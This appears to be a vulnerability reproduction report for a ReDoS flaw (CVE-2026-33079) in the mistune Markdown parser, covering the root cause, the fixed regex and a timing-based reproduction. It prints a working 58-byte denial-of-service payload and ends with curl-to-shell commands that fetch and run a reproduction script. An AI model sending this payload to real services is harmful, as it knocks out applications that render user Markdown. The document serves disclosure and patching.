Mistune: ReDoS via catastrophic backtracking in LINK_TITLE_RE
What's the vulnerability?
mistune's LINK_TITLE_RE regular expression contains overlapping
alternatives — an escaped-punctuation branch versus a two-ordinary-character
branch — inside a repeated group. When the regex engine cannot find a match,
these overlapping alternatives force it to explore an enormous number of
backtracking paths.
A Markdown document with a run of repeated ! characters and no closing quote
drives this catastrophic backtracking. The matching cost is roughly
exponential in the input length, so a tiny document (about 58 bytes) can hang
the renderer indefinitely.
Any code that renders attacker-supplied Markdown through mistune (user
comments, document uploads, etc.) is exposed to a denial-of-service.
Root Cause Analysis
# RCA Report: CVE-2026-33079 — Mistune ReDoS in LINK_TITLE_RE
## Summary
The `mistune` Markdown parser (versions 3.0.0a1 through 3.2.0) contains a Regular-expression Denial of Service (ReDoS) vulnerability in the `LINK_TITLE_RE` regular expression used during inline link parsing. The regex contains overlapping alternatives inside a repeated group: an escaped-punctuation branch (`\\` + `PUNCTUATION`) and a single-character branch (`[^"\x00]`). For input sequences such as `\!`, the regex engine can match the sequence either as one escaped-punctuation token or as two single-character tokens, leading to exponential backtracking when no closing quote is found. A crafted 58-byte Markdown document containing a link title with repeated backslash-escaped exclamation marks and no closing quote causes the renderer to hang for multiple seconds, enabling denial-of-service against any application that renders attacker-controlled Markdown.
## Impact
- **Package**: `mistune` (PyPI)
- **Repository**: https://github.com/lepture/mistune
- **Affected versions**: `3.0.0a1` through `3.2.0`
- **Fixed version**: `3.2.1`
- **CVE**: CVE-2026-33079
- **Advisory**: GHSA-8mp2-v27r-99xp
- **CWE**: CWE-1333 (Inefficient Regular Expression Complexity)
- **Severity**: High (CVSS 8.7)
- **Consequences**: Any code path that renders user-supplied Markdown through `mistune` (e.g., blog comments, document uploads, chat messages) can be forced to consume excessive CPU time, causing the application to hang or become unresponsive.
## Root Cause
The vulnerable `LINK_TITLE_RE` regex is defined in `src/mistune/helpers.py`:
```python
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|' # "title"
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'" # 'title'
r")"
)
```
Inside the repeated group `(?: ... )*`, the two alternatives overlap for certain two-character sequences:
- Alternative A: `\\` + `PUNCTUATION` — matches a backslash followed by any punctuation character (e.g., `\!`)
- Alternative B: `[^"\x00]` — matches any single character except `"` and null (e.g., `\` then `!` as two separate repetitions)
For the sequence `\!`, the regex engine has **two** ways to match it inside the repeated group. For `n` consecutive `\!` sequences, there are `2^n` possible matching paths. When the closing quote is missing, the engine must explore all of these paths before failing, resulting in exponential time complexity.
The fix (released in `mistune==3.2.1`) adds the backslash to the negated character classes, eliminating the overlap:
```python
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"|'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"
r")"
)
```
With `[^"\\\x00]`, the second alternative can no longer match a bare backslash, so `\!` can only be matched by Alternative A. This removes the exponential branching and reduces complexity to linear.
**Fix commit range**: `git diff v3.2.0 v3.2.1` in the `lepture/mistune` repository.
## Reproduction Steps
The reproduction is fully automated by `repro/reproduction_steps.sh`.
What the script does:
1. Creates a fresh Python virtual environment.
2. Installs the vulnerable version `mistune==3.2.0`.
3. Renders a crafted 58-byte Markdown payload:
```
[x](y "\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!)
```
This payload contains 25 backslash-escaped exclamation marks inside an unclosed double-quoted link title.
4. Measures wall-clock render time with a 5-second timeout.
5. Installs the fixed version `mistune==3.2.1`.
6. Repeats the timed render.
7. Compares results and writes a JSON verdict.
Expected evidence:
- **Vulnerable (`3.2.0`)**: Render exceeds the 5-second timeout (`RESULT: timeout`, `ELAPSED: ~5.0s`).
- **Fixed (`3.2.1`)**: Render completes in well under the timeout (`RESULT: completed`, `ELAPSED: <0.01s`).
## Evidence
Log files produced by the reproduction script:
- `logs/mistune_3.2.0.log` — vulnerable run
- `logs/mistune_3.2.1.log` — fixed run
Key excerpts:
**Vulnerable (3.2.0)**:
```
RESULT: timeout
ELAPSED: 5.0001s
```
**Fixed (3.2.1)**:
```
RESULT: completed
ELAPSED: 0.0026s
OUTPUT_LENGTH: 46
```
Environment:
- Python 3.x
- `mistune==3.2.0` (vulnerable) and `mistune==3.2.1` (fixed) installed from PyPI
- Wall-clock timeout: 5 seconds
- Payload: 58 ASCII bytes
## Recommendations / Next Steps
- **Upgrade immediately** to `mistune>=3.2.1`. The fix is a single-character change in the regex character class (adding `\\` to the negated class) and carries no functional risk.
- **Input sanitization**: If upgrading is not immediately possible, consider imposing a short CPU-time or wall-clock timeout on Markdown rendering operations, or pre-validating link syntax before passing to `mistune`.
- **Regression testing**: Add a ReDoS regression test to the project’s test suite using the 58-byte payload (or larger variants) to ensure the regex does not regress.
- **General best practice**: For regexes that process untrusted input, avoid overlapping alternatives inside unbounded repeated groups. Use tools such as `re2` or `regex` with linear-time guarantees, or statically analyze regexes for catastrophic backtracking.
## Additional Notes
- **Idempotency**: The reproduction script was run twice consecutively with identical results, confirming idempotency.
- **Payload size**: The payload is deliberately small (58 bytes) to demonstrate that even tiny attacker inputs can trigger the hang.
- **No external services required**: The vulnerability is 100% in-process; no network, browser, or database is needed for reproduction.
- **Limitations**: The timeout value (5s) was chosen to clearly distinguish the vulnerable behavior from the fixed behavior. On slower CPUs, the timeout may need to be adjusted, but the exponential gap ensures the distinction remains obvious.
Verify with pruva-verify
Run the Pruva CLI to automatically fetch and execute the reproduction script.
pruva-verify REPRO-2026-00148 pruva-verify GHSA-8mp2-v27r-99xp pruva-verify CVE-2026-33079 curl -fsSL https://pruva.dev/install.sh | sh Or Run Manually
Download the script
curl -O https://pruva.dev/api/v1/reproductions/REPRO-2026-00148/artifacts/reproduction_steps.sh Make executable
chmod +x reproduction_steps.sh Run the script
./reproduction_steps.sh How Pruva Reproduced This
Watch the AI agent's step-by-step process.
Loading session...
Artifacts
No artifacts available